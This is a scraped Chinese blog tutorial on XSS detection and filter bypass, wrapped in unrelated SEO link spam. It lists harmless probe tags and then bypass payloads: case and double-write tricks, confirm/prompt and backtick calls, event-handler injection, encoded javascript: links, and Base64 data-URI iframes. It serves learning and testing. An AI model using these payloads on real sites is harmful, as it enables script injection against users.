当前位置: 首页 > wzjs >正文

怎么让别人访问自己做的的网站网站的营销推广方案

怎么让别人访问自己做的的网站,网站的营销推广方案,做外贸一般在哪个网站,购物网站的建设背景免责声明&#xff0c;本博客只是用来自身学习记录&#xff0c;不要运用里面的代码去进行违法犯罪行为。 XSS 首先需要知道的是xss误区&#xff0c;就是在不确定是否有XSS的情况下&#xff0c;不应该是直接上攻击payload&#xff0c;例如<script>alert(123)</script&…

免责声明,本博客只是用来自身学习记录,不要运用里面的代码去进行违法犯罪行为。

XSS

首先需要知道的是xss误区,就是在不确定是否有XSS的情况下,不应该是直接上攻击payload,例如<script>alert(123)</script>,而是应该去进行一个XSS探测先确认有无XSS。
以下三种情况就是可能你直接一个payload过去毫无反应,但是你根本确定不了是否存在XSS

1.waf直接给你拦截了,你payload根本打不进去。
2.对方后端就过滤死了不让你使用</script>这种明显的标签。
3.对方压根就不允许弹框。

引用借鉴up主的关键句:XSS本质

XSS的本质原理就是解析了用户插入的标签,那么既然是解析标签,就可以插入没有攻击危害的标签进行先探测XSS。
如果解析标签成功,确认存在XSS,你再一步一步绕过那“三个大麻烦’,去搞攻击型payload看看是否存在XSS漏洞

下面都是无危害探测标签,基本不会触发任何WAF

<s>123
<h1>123</h1>
<p>123</p>
</tExtArEa><h1>123</h1>#
</tExtArEa><s>123#//--+
*"></tExtArEa><s>123#//--+

学习网站 XSS学习靶场

上面讲述了XSS的本质,就是看是否有网站解析,那网站解析结果就可以弹出来是否存在XSS,这个具体要看响应包,附以下截图
在这里插入图片描述
通过上面操作可以跳过waf,接下来说XSS的绕过手段

XSS绕过

一、XSS基础绕过

  • 大小写绕过
<Script>alert(1)</Script>
  • 双写绕过
<script<script>>alert(1)</sc</script>ript>
  • 禁用alert绕过
<img src="1" onerror="confirm('xss')"> (双引号可加可不加)
<script>confirm(1)</script>
<script>prompt(1)</script>
  • 禁用单引号
数字可以不加单引号
<script>confirm(`xss`)</script>
<script>confirm(/xss/)</script>
  • 过滤括号()
    可以使用反单引号代替 `
<script>alert`1`</script>
  • 禁用尖括号<>,只考虑在value属性里面
    也就是闭合value属性,加入触发事件
payload-hello' onmouseover='javascript:alert(1)'
  • 空格的代替
    空格的url编码为:%20
可替换成如下:
%09 %80a %8Ob %80c %Od %a0 /
  • 单引号的代替
    可以将单引号’换成飘号`

二、XSS混淆绕过

以下是比较好用的几个标签

</tExtArEa>'"<a/href="ja%26Tab;vas%26Tab;cript%26Tab;%26Tab;
%26Tab;:%26Tab;%26Tab;top%26Tab;[8680439..(30)]()">click_me</a>#
<div class=\"media-wrap image-wrap\"><img
src=\"https://img.threatbook.cn/c375eed802260503b4cee1086ea6
5f0e172480015227cf81a82d77.png\"
onerror=\"alert`1`\"/></div>
<script%20type="text/javascript">%20var%20reg%20=%20/test/;%
20var%20str%20=%20%27testString%27;%20var%20result%20=%20reg
.exec(str);%20alert(result);%20</script>

三、XSS编码加密绕过

套一层Base64

<iframe
src="data:text/html;base64,PFNDcmlwdD5hbGVydCgxKTwvU0NyaXB0Pg=="></iframe>

套两层Base64

<iframe
src="PG9iamVjdCBkYXRhPQ0KZGF0YTp0ZXh0L2h0bWw7YmFzZTY0LCBQSE5qY21sd2RENWhiR1Z5ZENnbmVITnpKeWs4TDNOamNtbHdkRDQ9Pjwvb2JqZWN0Pg=="></iframe>
http://www.dtcms.com/wzjs/198724.html

相关文章:

  • 中国住房和城乡建设部网站公文网站seo什么意思
  • wordpress企业网站制作百度搜索引擎推广
  • 做古代风格头像的网站淘宝seo优化排名
  • 阿里云建站流程线上推广方式都有哪些
  • 网站兼容代码做网页设计一个月能挣多少
  • Ag网站制作做百度推广需要什么条件
  • 用微信小程序怎么做网站互联网广告管理暂行办法
  • java做网站用什么工具百度网盘首页
  • 网站图片列表怎么做百度免费发布信息网站
  • 网站营销设计百度高搜
  • dede免费模板教育网站企业查询系统官网
  • 网站制作的管理最新国内你新闻
  • 公司付网站会员费科目怎么做百度广告语
  • 公司有域名 如何做网站百度爱采购官网首页
  • 网站做竞价对优化有好处吗网站排名优化首页
  • 学校网站建设需求2023年7月疫情爆发
  • 大学生网页制作北京seo学校
  • 有网站怎么做app百度世界排名
  • 淄博网站客户色盲测试图 考驾照
  • 户网站建设的不全.seo专员是指什么意思
  • 英文网站建设大概多少钱淘宝关键词排名是怎么做的
  • 网络营销课程主要讲什么内容在线seo优化
  • 做网站商百度竞价排名收费
  • 云排名网站阿里云免费域名
  • 福建泉州做网站公司哪家好营销策划方案范文1500
  • 网站建设那个公司好合肥网络推广软件系统
  • wordpress+手机站百度网址提交入口
  • 网站建设合同贴花算哪一类优化seo网站
  • 甘肃网站推广商丘seo博客
  • 网站做电商销售需要注册吗深圳网站建设公司